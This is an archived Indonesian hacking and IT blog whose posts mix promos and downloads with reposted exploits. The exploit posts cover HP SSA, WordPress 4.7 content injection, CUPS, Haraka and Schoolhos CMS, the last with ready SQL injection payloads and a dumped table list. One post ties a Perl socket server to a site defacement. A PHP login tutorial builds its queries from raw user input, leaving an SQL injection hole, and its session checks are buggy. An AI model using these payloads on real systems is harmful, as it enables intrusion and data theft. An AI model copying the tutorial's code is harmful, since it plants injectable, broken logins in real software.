Tampilkan postingan dengan label Info IT. Tampilkan semua postingan
Tampilkan postingan dengan label Info IT. Tampilkan semua postingan

Jumat, 29 Maret 2019

120 TELE AIRDROP ONGOING AT MIRACLETELE

120 TELE AIRDROP ONGOING AT MIRACLETELE 

 

Hello guys, i back again at my blog with long time no Posting or make something xD
Today i wanna inform your about 120 TELE AIRDROP, how to Get IT?

Read and Follow this article:

First, you must be register at : Here! or HERE!

After success register and confirm your data,

just follow next insturction by complite small task at Claim AIRDROP

WHAT YOU WAITING NOW, JUST GO xD


Kamis, 13 Juli 2017

SafeURL Open Source

RZLabs Exploit

SafeURL Open Source

Img

-

-

-

Tutorial Title: SafeURL Open Source
Tutorial Author: RZLabs
Tutorial Type: Website
The content of the article:

Final Release!
SafeURL V 2.0 Beta Done Upload on Github!
-> Link Get Source Code
This demo about my project. Some features are not yet available.
-> Advertisement panel
-> News Panel
-> Use Password and Expired when link visited!
Note : If you set use password is yes, when everyone visit you link must be insert password and if no, no password request ^_^
Note : This Project Open Source so you can modift or what you need!
But don't remove my name at my project!
If you want to help me develop this project, you can help me by donating using Bitcoin
BTC Address 1 : 1NrYcaRV5XXrmt4idvCaJQGCmUxrjffri4
BTC Address 1 : 1GDzh9SVDZuX9UybQSM6o2dsCitxivMwBR
Author : Re Zero Labs || www.rezerolabs.xyz

Link Source Code Upload Date
Direct Download Unknow
Donation:

: 1NrYcaRV5XXrmt4idvCaJQGCmUxrjffri4

: 1GDzh9SVDZuX9UybQSM6o2dsCitxivMwBR

Minggu, 09 Juli 2017

Tutorial Socket Server with Perl

Tutorial Socket Server with Perl

Img

-

-

-

Title: Tutorial Socket Server with Perl
Author Web: Re Zero Labs
Proof of concept:

Selamat malam soba blogger! Malam hari ini saya akan share bagaimana cara socket server, seperti server Meme Comic Indonesia (MCI) kenak Deface di Port 1337.

Kita gunakan method yang di share oleh Founder IndoXploit, yuk di simak video tutorial di bawah ini:


Img

Command:
 
for run
perl filename.pl
example : perl.indoxploit.pl

for check run or not
ps aux | grep 'filename'
example : ps aux | grep'indoxploit'
Script/Tool Upload Date
Paste Bin Unknow
Source/Original Post:

Tutorial Socket Server with Perl

Donation:

: 1GDzh9SVDZuX9UybQSM6o2dsCitxivMwBR

: -

Selasa, 23 Mei 2017

Simple Bypass kbagi.com dari Internet Positif di Windows All Version

Simple Bypass kbagi.com dari Internet Positif di Windows All Version

Img

-

-

-

News Title: Simple Bypass kbagi.com dari Internet Positif di Windows All Version
News Author: RZLabs
Tags: Info IT, News
Tested: Windwos 10 Pro 32 & 64 Bit
The content of the article:
Yahoo, Selamat pagi warganet ^_^. Kali ini mimin punya kabar bagus bagi yang belum tau :v.
Nih, yang sering download di kbagi.com dan terkenak Internet Positif pasti bikin sebelkan?
Trik ini hanya penggunan PC/Laptop kalau Android sih bisa cuman harus di Root dulu -_- :v
nanti saya kasih tau caranya kalau penggunan Android tapi harus sudah di root dulu :v.
Ok Pertama sobat download dulu file yang di butuhkan, linknya ada di bawah.

Jika sudah, extract file yang sudah didownload lalu copy file tersebut ke
" C:\Windows\System32\drivers\etc ".
Jika ada popup klik continue dan replace saja dan coba test di browser dengan mengunjungi situ kbagi.com
semoga artikel ini bermanfaat. Sekian dan Terima Kasih. Jika bermanfaat silahkan bagikan artikel ini ke teman, saudara atau sahabat anda ^_^
Filename Download Link File Size Upload Date
Unlock kbagi.com Open Load 1 KB 23-Mei-2017 08:04:58
Donation:

: 1GDzh9SVDZuX9UybQSM6o2dsCitxivMwBR (Bitcoin)

: -

Selasa, 02 Mei 2017

kbagi.com terkenak internet positif?

kbagi.com terkenak internet positif?

Img

-

-

-

News Title: kbagi.com terkenak internet positif?
News Author: RZLabs
Tags: Info IT, News
The content of the article:
Selama Pagi menjelang siang kawan!. Hari ini saya akan berbagi sebuah informasi menari bagi kawan yang suka download.
Terutama yang suka download file dari server kbagi.com, yupss! Server kbagi sekarang sudah susah di akses, server di alihkan ke internet positif -_-. Dampak ini di rasakan bagi pengguna indih*me atau isp lainnya!
Untuk bisa menggunakan layanan dari server kbagi.com user di sarankan menggunakan proxy atau vpn. Untuk cara menggunakannya nanti akan di bawah di article lainnya
Sekian untuk artikel ini! Sekedar Info saja!

Selasa, 04 April 2017

Hirens.BootCD.15.2 New

RZLabs Hirens.BootCD.15.2 New

Img

File Size

MB

Filename: Hirens.BootCD.15.2
Author Web: Hirens BootCD
ISO MD5: 7EFC81ADBBD551D56F6021C439C6837C
ZIP MD5: D342BBD6BF7554ABA24A376E41675DBF
Vendor Homepage: Hirens BootCD
About Hirens BootCD:

When it comes to having a certain PC streamlined, base lined, or simply reformatted, there are various ways to do so. Many resort to using the traditional clean install, where the primary driver is reformatted, thus leaving the PC clean and new, and the only thing that is very tedious to do afterwards are none other than installing once again the drivers or hardware installed on the computer, which usually take 2 or 3 hours to finish. What more if the computer is having a problem to boot or load the operating system? What if the BIOS (Basic I/O or Input / Output System) becomes corrupt thus not able to access the operating system like Windows or Mac, and not being able to access the files? Well, there is a solution to this, and it’s another easy to use software: Hiren’s BootCD.

Hiren’s BootCD is a boot disk utility that will help in resolving and making reformatting your computer easy. This kind of compilation software provides a compilation of programs to help resolves most and some uncommon Internet and computer issues like driver failure, intermittent internet connection and other computer malfunctions.

Features:

Partition Tools

Backup & Recovery

Antivirus Tools

Testing Tools

Password Tools

Mini Windows XP

Other Tools

Filename Download Link File Size Upload Date
Hirens.BootCD.15.2 Direct Download 593M 09-Nov-2012 05:08
Hirens.BootCD.10.6 Direct Download 270M 02-Nov-2010 14:44
Hirens.BootCD.9.9 Direct Download 177M 02-Nov-2010 16:35
Source/Original Post:

Hirens BootCD

Data Utama Mirror

Donation:

: 1GDzh9SVDZuX9UybQSM6o2dsCitxivMwBR

: -

Sabtu, 04 Maret 2017

Program Grow Exabytes Free Domain dan Hosting

 
 
Selamat malam kawan, malam ini saya membawa sebuah kabar baik bagi kalian yang butuh domain untuk keperlua bisni. Sesua judulnya di sini saya akan memberikan sebuah info tentang domain gratis yang bisa anda claim dari PT. EXABYTES NETWORK INDONESIA dengan ketentuan sebagai berikut ini.

Gagung dulu di : Sini untuk claim domainnya ^_^

Syarat ikut Program Grow Exabytes

  1. Facebook Page sudah aktif/dibuat sebelum 1 January 2017.
  2. 1 Domain hanya untuk 1 orang (1 Facebook Page)
  3. Mengirimkan informasi yang benar (valid)
  4. Facebook Page digunakan untuk usaha (kegiatan jual-beli)
  5. Nama Domain yang didaftarkan harus sama (berhubungan) dengan Facebook Page tersebut. Contoh yang benar: Facebook Page: https://www.facebook.com/Toko-Jilbab-Bunda-Kartika mendaftarkan nama domain www.tokojilbabbundakartika.com Contoh yang salah: Facebook Page: https://www.facebook.com/Toko-Jilbab-Bunda-Kartika mendaftarkan nama domain www.tokohandphone.com
Syarat & Ketentuan
  1. Nama Domain tidak bisa berubah/dihapus setelah didaftarkan.
  2. Hanya Domain dan Email yang Anda terima.
  3. Kapasitas Email yang di dapat sebesar 5GB maksimum 5 akun email shared hosting. Untuk kapasitas lebih besar diperlukan upgrade ke paket lain.
  4. Promo ini hanya berlaku untuk tahun pertama. Biaya perpanjangan sebesar Rp. 40.000,- /bulan untuk tahun selanjutnya.
  5. Domain akan diaktifkan paling lambat 1×24 jam (hari kerja) jika memenuhi persyaratan diatas.
  6. Exabytes berhak untuk mengubah syarat dan ketentuan penawaran ini tanpa pemberitahuan sebelumnya.
  7. Dengan menerima promosi ini, Anda setuju untuk persyaratan layanan yang tersedia di sini.
 
Bagai main kawain membutuhkannya?

Silahkan daftar di link : Ini dan Masukan Coupon : exabytesgrow saat pembayaraan

atau bisa klik link : Ini

Note :
 -> Domain akan aktif 1 x 24 Jam jadi harus bersabar
-> Domain akan aktif sesuai Syarat di atas ^_^

Sekian artikel saya ini, semoga bermanfaat dan terima kasih telah berkunjung dan jangn lupa
share artikel ini jika bermanfaat dan bookmark untuk mendapatkan info terbaru walau updatenya tidak sesuai ;v

source/sumber info: https://www.exabytes.co.id/grow?utm_source=website&utm_campaign=grow&utm_medium=banner&utm_content=homepage 

Minggu, 12 Februari 2017

HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)

HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)


Yahoo, welcome back with me. Now i share about Metasploit Framework, lets read it!

Note:
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
Description:
This module exploits a vulnerability found in HP Smart Storage Administrator. By supplying a specially crafted HTTP request, it is possible to control the 'command' variable in function isDirectFileAccess (found in ipcelmclient.php), which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.

Info Metasploit:
 Title  : HP Smart Storage Administrator Remote Command Injection
Author : Nicolas Mattiocco (@MaKyOtOx)
Platform : Linux/Windows
DisclosureDate : Jan 30 2017
CVE : 2016-8523
Code Metasploit:
 


Thanks for visiting guys. Don't forget Bookmark this blog and Share it :D

Jumat, 10 Februari 2017

Cmd Set Path Environment Variable

Cmd Set Path Environment Variable

freebitcoin
Yahoo bros :D ketemu lagi dengan admin RZLabs. Kali ini admin akan berbagi tutorial yang admin ambil di artikel admin yang lama :3. Siapa tau ada yang butuh hehehehe :). Ok langsung ajah di simak ya ^_^!!!

Sobat penah mengalami pastinya :D saat menjalakan perintah di cmd atau command line dengan perintah php rzlabs.php pasti keluar error seperti ini:

'php' is not recognized as an internal or external command,
operable program or batch file.
Screenshot:


Terus bagaimana caranya agar tidak error seperti itu?
Mari kita simak carannya :D

Pertama buat file text baru dan ganti  extensinya menjadi .cmd atau .bat
contoh set.path.cmd atau set.path.bat lalu buka dengan notepad kesayangan anda. Di sini admin menggunakan Synwrite, kalau belum punya notepadnya bisa di download di link berikut ini:

Download SynWrite Here 

Ok, jika sudah membuat file tersebut tinggal sisipkan code beriku ini:
 PATH %PATH%;C:\xampp\php
Note: tulisan yang merah di sesuaikan dengan letak php.exe - nya :D
lalu save dan jalankan file tersebut dengan run Administrator. Dan kita coba buka file yang kita inginkan lagi.

 Screenshot Success:
Note: Mungkin cara ini tidak permanent


Mohon maaf jika ada kesalahan kata ^_^ terima kasih sudah berkunjung di blog kami. Jika ada keluhan, saran atau kritik mohon sampaikan di komentar ^_^ terima kasih lagi ^_^ 
 

freebitcoin


Selasa, 07 Februari 2017

WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)

WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)

 Yahoo kawan, kali ini saya akan berbagi sebuah exploit yang sesusai judulnya. Yap langsung ajah di simak ya ^_^

# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Date: 2017-02-02
# Exploit Author: @leonjza
# Vendor Homepage: https://wordpress.org/
# Software Link: Download here
# Version: Wordpress 4.7.0/4.7.1
# Tested on: Debian Jessie
#
# PoC gist: Here
#
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: Read here

 Usage example:
List available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
#  - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
Update post with content from a file:
#
# $ cat content
# foo
#
# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!
 Tool:

Sekian terima kasih, jika ada kesalahan kata mohon maaf ^_^. We just shared not claimer ^_^

Special Thank for : @leonjza

Source/original post: Here

Senin, 06 Februari 2017

CUPS < 2.0.3 - Remote Command Execution

CUPS < 2.0.3 - Remote Command Execution


freebitcoin
Aye - aye sir, welcome back again friends at RZLabs Blog. Blog tempat share game, software dan tutorial. Disini saya akan share sebuah tutorial tentang RCE atau Remote Code Execution.

Penjelasan sedikit tentang RCE atau Remote Code Execution.

RCE ( Remote Code Execution ) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi, selengkapnya baca di google bros ^_^.

# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
# Google Dork: n/a
# Date: 2/2/17
# Exploit Author: @0x00string
# Vendor Homepage: cups.org
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
# Version: <2.0.3
# Tested on: Ubuntu 14/15
# CVE : CVE-2015-1158

Tutorial ada di dalam tools:



App Vuln Download Link:
Direct Download

Source/origini info/post: CUPS < 2.0.3 - Remote Command Execution

Terima kasih susah mampir diblog saya ^_^. Jika ada salah kata mohon maaf dan jangan lupa share post ini dan bookmark link blog ini ya ^_^.

Special Thanks to: @0x00string


freebitcoin


Sabtu, 04 Februari 2017

Haraka < 2.8.9 - Remote Command Execution

Haraka < 2.8.9 - Remote Command Execution


freebitcoin
Aye - aye sir, welcome back again friends at RZLabs Blog. Blog tempat share game, software dan tutorial. Disini saya akan share sebuah tutorial tentang RCE atau Remote Code Execution.

Penjelasan sedikit tentang RCE atau Remote Code Execution.

RCE ( Remote Code Execution ) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi, selengkapnya baca di google bros ^_^.

# Exploit Title: Harakiri
# ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection
# Exploit Author: xychix [xychix at hotmail.com] / [mark at outflank.nl]
# Date: 26 January 2017
# Category: Remote Code Execution
# Vendor Homepage: https://haraka.github.io/
# Vendor Patch: https://github.com/haraka/Haraka/pull/1606
# Software Link: https://github.com/haraka/Haraka
# Exploit github: http://github.com/outflankbv/Exploits/
# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
# Version:  <= Haraka 2.8.8 (with attachment plugin enabled)
# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
# Tested versions: 2.8.8 and 2.7.2
# CVE : CVE-2016-1000282
# Credits to: smfreegard for finding and reporting the vulnerability
# Thanks to: Dexlab.nl for asking me to look at Haraka.

Tutorial ada di dalam tools:

Screenshot:

App Vuln Download Link:
Direct Download

Source/origini info/post: Haraka < 2.8.9 - Remote Command Execution - Exploit DB

Terima kasih susah mampir diblog saya ^_^. Jika ada salah kata mohon maaf dan jangan lupa share post ini dan bookmark link blog ini ya ^_^.

Special Thanks to: Dexlab.nl, smfreegard and xychix


freebitcoin


Rabu, 09 November 2016

Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection

Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection


Holaaaaa, selamat malam kawan RZLabs. Pada malam hari ini saya akan berbagi sebuah info tentang exploit sebuah cms sekolah yaitu Schoolhos CMS 2.29 vulnerability teradapt SQL Injection, sperti apa exploitnya simak artike ini.
Info:
Doc Title: Schoolhos CMS v2.29 - SQL Injection Vulnerability
Exploit Type: SQL Injection Vulnerability
Exploitation Technique: Remote
Severity Level: High
Author: Vulnerability-Lab
Release Date: 2016-11-07
Vendor Homepage: Schoolhos
Lates CMS Download: CMS Schoolhos Download
Vuln CMS Download: Vulnerable App
Technical Detail and Description:
A remote sql injection web vulnerability has been discovered  in the official Schoolhos v2_29 content management system.
The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.
The sql injection vulnerability is located in the `kelas` parameter of the `index?p=siswakelas module POST method request.
Remote attackers are able to execute own sql commands by usage of an insecure post method request through the vulnerable
parameter of the own application. The attack vector of the vulnerability is application-side and the request method to
inject is POST. The security vulnerability in the content management system is a classic select remote sql-injection.
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7.
Exploitation of the remote sql injection vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] POST
Vulnerable Module(s):
[+] ./SCRIPTPATH/index.php?p=siswakelas
Vulnerable Parameter(s):
[+] kelas
Proof of Concept ( PoC ):
Remote sql-injection kerentanan web dapat dimanfaatkan oleh penyerang jarak jauh tanpa web-aplikasi akun pengguna istimewa dan tanpa interaksi pengguna.
Untuk demonstrasi keamanan atau untuk mereproduksi sql-injection kerentanan web mengikuti informasi yang diberikan dan langkah-langkah di bawah ini untuk melanjutkan.
 
PoC Session Logs:
[+] Place: POST > Parameter: kelas
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kelas=1' AND 4945=4945 AND 'SfWY'='SfWY
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: kelas=-2062' UNION ALL SELECT NULL,CONCAT(0x71736b6271,0x43746d4846536767524d,0x716b6d6171),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: kelas=1' AND SLEEP(5) AND 'Wqrd'='Wqrd
---
[21 tables]
+-----------------+
| sh_agenda       |
| sh_album        |
| sh_berita       |
| sh_buku_tamu    |
| sh_galeri       |
| sh_guru_staff   |
| sh_info_sekolah |
| sh_jabatan      |
| sh_kategori     |
| sh_kelas        |
| sh_komentar     |
| sh_mapel        |
| sh_materi       |
| sh_pengaturan   |
| sh_pengumuman   |
| sh_psb          |
| sh_sidebar      |
| sh_siswa        |
| sh_statistik    |
| sh_tema         |
| sh_users        |
+-----------------+
Solution - Fix and Patch:
 Kerentanan sql-injection di `parameter kelas` dari` permintaan metode file POST index.php`  dapat ditambal oleh penggunaan yang aman
Pernyataan siap. Mengurai parameter dan mengkodekan nilai-nilai ke format aman untuk mencegah lebih lanjut
serangan sql-injection. Melarikan diri parameter dan melarang penggunaan karakter khusus.
Credits and Authors:
Vulnerability Laboratory [Research Team] - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer)
Disclaimer and Information:
Domains: Vulnerability Lab - Vuln Lab - Evolution
Section: Magazine - Vuln lab Contact - Evolution Contact
Social: Twitter Vuln Lab - Facebook Vuln Lab
Feeds: Vuln Lab RSS - UP Coming - News
References [Source]:
Vuln Lab Artikel
Exploit DB
Sekian dari artikel yang saya tulis. Mohon maaf jika ada kekurangnnya ya kawan. Semoga bermanfaat ^_^. Jangan lupa like dan share post ini ya ^_^.
  
freebitcoin


Rabu, 02 November 2016

Tutorial Membuat Login Multi Level Dengan Mysqli

Tutorial Membuat Login Multi Level Dengan Mysqli


Yahoo, selamat sore kawan RZlab. Sore ini saya akan berbagi sebuah tutorial " Tutorial Membuat Login Multi Level Dengan Mysqli " bagai caranya yuk mari kita simak saja.
Download Login Multi Level
Pertama kita buat databasenya dengan nama demo_login lalu buat table dengan nama tbl_login dengan colums 4, perhatikan screenshot berikut ini:

 Jika sudah insert data ke dalam tbl_login:
Username: vip
Password: vip
Level: vip

Username: trial
Password: trial
Level: trial
Note: Password harus menggunakan hash MD5.

Jika sudah memasukan data ke dalam tbl_login selanjutnya buat file login.php dan copy code berikut ini:

<?php
session_start();
/**
 @Filename: login.php
 @Version: 0.1
 @Author: Aihara Anwaru
 @Blog: http://rezerolab.blogspot.com 
 @E-mail: anwaru@yandex.com
 
 @deskripsi: baca di google ajah gan
**/
 //@check sudah login atau belum
 if(@$_SESSION['level'] == "vip"){
 echo "<script>window.location='./vip.php'</script>";
 }elseif(@$_SESSION['level'] == "trial"){
 echo "<script>window.location='./trial.php'</script>";  
 }
 //@setting connection ke databse
$con = new mysqli('localhost', 'root', '', 'demo_login');
if($con->connect_errno > 0) {
	die('Could not connect: ' . connect_error());
}
?>
<html>
<head>
<title>Login Multi Level</title>
<link href='view-source:http://d2f0ora2gkri0g.cloudfront.net/bkasia47535_favicon.ico?v=1474960911' rel='icon' type='image/x-icon'/>
<link href='https://plus.google.com/110358378598572679031/posts' rel='publisher'/>
<link href='https://plus.google.com/110358378598572679031/about' rel='author'/>
<link href='https://plus.google.com/110358378598572679031' rel='me'/>
<meta content='LlbnsWclpd4kvm3UoaTcB1Wi033-vYqxDRylELAz4HQ' name='google-site-verification'/>
<meta content='9B7052F906A8B4A4D601D2C9EB2813C4' name='msvalidate.01'/>
<meta content='xxxxx' name='alexaVerifyID'/>
<meta content='Indonesia' name='geo.placename'/>
<meta content='Aihara Anwaru' name='Author'/>
<meta content='general' name='rating'/>
<meta content='id' name='geo.country'/>
<meta content='https://www.facebook.com/tinkere21' property='article:author'/>
<meta content='https://www.facebook.com/rezerolab' property='article:publisher'/>
<meta content='xxxxx' property='fb:app_id'/>
<meta content='xxxxx' property='fb:admins'/>
<meta content='en_US' property='og:locale'/>
<meta content='en_GB' property='og:locale:alternate'/>
<meta content='id_ID' property='og:locale:alternate'/>
<meta content='summary' name='twitter:card'/>
<meta expr:content='data:blog.pageTitle' name='twitter:title'/>
<meta content='xxxxx' name='twitter:site'/>
<meta content='xxxxx' name='twitter:creator'/>
<style type="text/css">
body{
  background:#000;
  color:#00ff00;
  border-style: dashed;
}
h1{
	text-align: center;
}
#login-form{
  text-align: center;
}
input{
	border: 1;
	border-color: #df0000;
	background: #000;
	color: #00ff00; 
  border-style: dashed;
}
#footer{
  text-align: center;
  color:#666699;
  text-transform: none;
  text-decoration: none;
}
a{
  color:#df0000;
  text-transform: none;
  text-decoration: none;
}
a:hover{
  color:#00ff00;
  text-transform: none;
  text-decoration: none;
}
#alert{
  text-align: center;
  color:#df0000;
}
#success{
  text-align: center;
  color:#00ff00;
}
#flag{
  text-align: center;
  color:#00f
}
</style>
</head>
<body>
<h1><a href="http://rezerolab.blogspot.com">Re Zero Labs</a> Login Multi Level</h1>
<div id="alert">
<?php
if(@$_GET['st'] == "info"){
 echo "<p>Your Username/Password Is Empty</p>";
}elseif(@$_GET['st'] == "warning"){
  echo "<p>Username/Password Not Macth! Try Again!</p>";
}
?>
</div>
<form id="login-form" action="?do=login&act=login&st=true" method="POST" /> 
<input type="text" name="user" /> : <input type="password" name="pass" /> = <input type="submit" name="go" value="Login" />
</form>
<div id="footer">
<p>Copyright &copy; 2016 <a href="http://rezerolab.blogspot.com">Re Zero Labs</a></p>
</div>
<?php
$do = @$_REQUEST['do'] == "login";
$gate =@$_REQUEST['act'] == "login";
$status =@$_REQUEST['st'] == "true";
$user = @$_POST['user'];
$pass = @$_POST['pass'];
if($do){
  if($user == '' || $pass == ''){
    echo "<script>window.location='?act=info'</script>";
  }else{
  $sqli_query = $con->query("SELECT * FROM tbl_login WHERE username='$user' and password=md5('$pass')");
  $sqli_row=$sqli_query->fetch_array();
  $sqli_count = $sqli_query->num_rows;
  if($sqli_count == "0"){
    echo "<script>window.location='?st=warning'</script>";
  }elseif($sqli_count == "1"){
    if($sqli_row['level'] == "vip"){
      @$_SESSION['rzlab_level'] = $sqli_row['level'];
      @$_SESSION['rzlab_id'] = $sqli_row['id'];
      @$_SESSION['rzlab_uname'] = $sqli_row['username'];
      echo "<script>window.location='./vip.php?st=sukses'</script>"; 
    }elseif($sqli_row['level'] == "trial"){
      @$_SESSION['rzlab_level'] = $sqli_row['level'];
      @$_SESSION['rzlab_id'] = $sqli_row['id'];
      @$_SESSION['rzlab_uname'] = $sqli_row['username'];
      echo "<script>window.location='./trial.php?st=sukses'</script>";
    }
  }
  }
}
?>
</body>
</html>
Langkah selanjutnya membuat file vip.php dan trial.php. Copy code berikut ini:

vip.php
<?php
session_start();
/**
 @Filename: vip.php
 @Version: 0.1
 @Author: Aihara Anwaru
 @Blog: http://rezerolab.blogspot.com 
 @E-mail: anwaru@yandex.com
**/
 //@check sudah login atau belum dan check level
 if(@$_SESSION['rzlab_level'] == "trial"){
 die("You not allowed to access this page!");
 }
 if(empty(@$_SESSION['rzlab_level'])){
 echo "<script>window.location='./login.php'</script>";
 }
 //@setting connection ke databse
$con = new mysqli('localhost', 'root', '', 'demo_login');
if($con->connect_errno > 0) {
	die('Could not connect: ' . connect_error());
}
?>
<html>
<head>
<title>Login Multi Level</title>
<link href='view-source:http://d2f0ora2gkri0g.cloudfront.net/bkasia47535_favicon.ico?v=1474960911' rel='icon' type='image/x-icon'/>
<link href='https://plus.google.com/110358378598572679031/posts' rel='publisher'/>
<link href='https://plus.google.com/110358378598572679031/about' rel='author'/>
<link href='https://plus.google.com/110358378598572679031' rel='me'/>
<meta content='LlbnsWclpd4kvm3UoaTcB1Wi033-vYqxDRylELAz4HQ' name='google-site-verification'/>
<meta content='9B7052F906A8B4A4D601D2C9EB2813C4' name='msvalidate.01'/>
<meta content='xxxxx' name='alexaVerifyID'/>
<meta content='Indonesia' name='geo.placename'/>
<meta content='Aihara Anwaru' name='Author'/>
<meta content='general' name='rating'/>
<meta content='id' name='geo.country'/>
<meta content='https://www.facebook.com/tinkere21' property='article:author'/>
<meta content='https://www.facebook.com/rezerolab' property='article:publisher'/>
<meta content='xxxxx' property='fb:app_id'/>
<meta content='xxxxx' property='fb:admins'/>
<meta content='en_US' property='og:locale'/>
<meta content='en_GB' property='og:locale:alternate'/>
<meta content='id_ID' property='og:locale:alternate'/>
<meta content='summary' name='twitter:card'/>
<meta expr:content='data:blog.pageTitle' name='twitter:title'/>
<meta content='xxxxx' name='twitter:site'/>
<meta content='xxxxx' name='twitter:creator'/>
<style type="text/css">
body{
  background:#000;
  color:#00ff00;
  border-style: dashed;
}
h1{
	text-align: center;
}
#login-form{
  text-align: center;
}
input{
	border: 1;
	border-color: #df0000;
	background: #000;
	color: #00ff00; 
  border-style: dashed;
}
#footer{
  text-align: center;
  color:#666699;
  text-transform: none;
  text-decoration: none;
}
a{
  color:#df0000;
  text-transform: none;
  text-decoration: none;
}
a:hover{
  color:#00ff00;
  text-transform: none;
  text-decoration: none;
}
#alert{
  text-align: center;
  color:#df0000;
}
#success{
  text-align: center;
  color:#00ff00;
}
#flag{
  text-align: center;
  color:#00f
}
</style>
</head>
<body>
<h1><a href="http://rezerolab.blogspot.com">Re Zero Labs</a> Halaman VIP</h1>
<div id="success">
<?php
if(@$_GET['st'] == "sukses"){
 echo "<p>Anda Berhasil Login Sebagai VIP Dengan User ".@$_SESSION['rzlab_uname']."</p>";
}
?>
</div>
<center><p>Selamat datang, <?php echo @$_SESSION['rzlab_uname']; ?> || <a href="?do=logout">Logout</a></p></center>
<div id="footer">
<p>Copyright &copy; 2016 <a href="http://rezerolab.blogspot.com">Re Zero Labs</a></p>
</div>
<?php
$logout = @$_REQUEST['do'] == "logout";
if($logout){
     session_destroy();
     unset($_SESSION['rzlab_level']);
     unset($_SESSION['rzlab_id']);
     unset($_SESSION['rzlab_uname']);
     echo "<script>window.location='./login.php'</script>"; 
}
?>
</body>
</html>
trial.php
<?php
session_start();
/**
 @Filename: trial.php
 @Version: 0.1
 @Author: Aihara Anwaru
 @Blog: http://rezerolab.blogspot.com 
 @E-mail: anwaru@yandex.com
**/
 //@check sudah login atau belum
 if(empty(@$_SESSION['rzlab_level'])){
 echo "<script>window.location='./login.php'</script>";
 }
 //@setting connection ke databse
$con = new mysqli('localhost', 'root', '', 'demo_login');
if($con->connect_errno > 0) {
	die('Could not connect: ' . connect_error());
}
?>
<html>
<head>
<title>Login Multi Level</title>
<link href='view-source:http://d2f0ora2gkri0g.cloudfront.net/bkasia47535_favicon.ico?v=1474960911' rel='icon' type='image/x-icon'/>
<link href='https://plus.google.com/110358378598572679031/posts' rel='publisher'/>
<link href='https://plus.google.com/110358378598572679031/about' rel='author'/>
<link href='https://plus.google.com/110358378598572679031' rel='me'/>
<meta content='LlbnsWclpd4kvm3UoaTcB1Wi033-vYqxDRylELAz4HQ' name='google-site-verification'/>
<meta content='9B7052F906A8B4A4D601D2C9EB2813C4' name='msvalidate.01'/>
<meta content='xxxxx' name='alexaVerifyID'/>
<meta content='Indonesia' name='geo.placename'/>
<meta content='Aihara Anwaru' name='Author'/>
<meta content='general' name='rating'/>
<meta content='id' name='geo.country'/>
<meta content='https://www.facebook.com/tinkere21' property='article:author'/>
<meta content='https://www.facebook.com/rezerolab' property='article:publisher'/>
<meta content='xxxxx' property='fb:app_id'/>
<meta content='xxxxx' property='fb:admins'/>
<meta content='en_US' property='og:locale'/>
<meta content='en_GB' property='og:locale:alternate'/>
<meta content='id_ID' property='og:locale:alternate'/>
<meta content='summary' name='twitter:card'/>
<meta expr:content='data:blog.pageTitle' name='twitter:title'/>
<meta content='xxxxx' name='twitter:site'/>
<meta content='xxxxx' name='twitter:creator'/>
<style type="text/css">
body{
  background:#000;
  color:#00ff00;
  border-style: dashed;
}
h1{
	text-align: center;
}
#login-form{
  text-align: center;
}
input{
	border: 1;
	border-color: #df0000;
	background: #000;
	color: #00ff00; 
  border-style: dashed;
}
#footer{
  text-align: center;
  color:#666699;
  text-transform: none;
  text-decoration: none;
}
a{
  color:#df0000;
  text-transform: none;
  text-decoration: none;
}
a:hover{
  color:#00ff00;
  text-transform: none;
  text-decoration: none;
}
#alert{
  text-align: center;
  color:#df0000;
}
#success{
  text-align: center;
  color:#00ff00;
}
#flag{
  text-align: center;
  color:#00f
}
</style>
</head>
<body>
<h1><a href="http://rezerolab.blogspot.com">Re Zero Labs</a> Halaman Trial</h1>
<div id="success">
<?php
if(@$_GET['st'] == "sukses"){
 echo "<p>Anda Berhasil Login Sebagai Trial Dengan User ".@$_SESSION['rzlab_uname']."</p>";
}
?>
</div>
<center><p>Selamat datang, <?php echo @$_SESSION['rzlab_uname']; ?> || <a href="?do=logout">Logout</a></p></center>

<div id="footer">
<p>Copyright &copy; 2016 <a href="http://rezerolab.blogspot.com">Re Zero Labs</a></p>
</div>
<?php
$logout = @$_REQUEST['do'] == "logout";
if($logout){
     session_destroy();
     unset($_SESSION['rzlab_level']);
     unset($_SESSION['rzlab_id']);
     unset($_SESSION['rzlab_uname']);
     echo "<script>window.location='./login.php'</script>"; 
}
?>
</body>
</html>
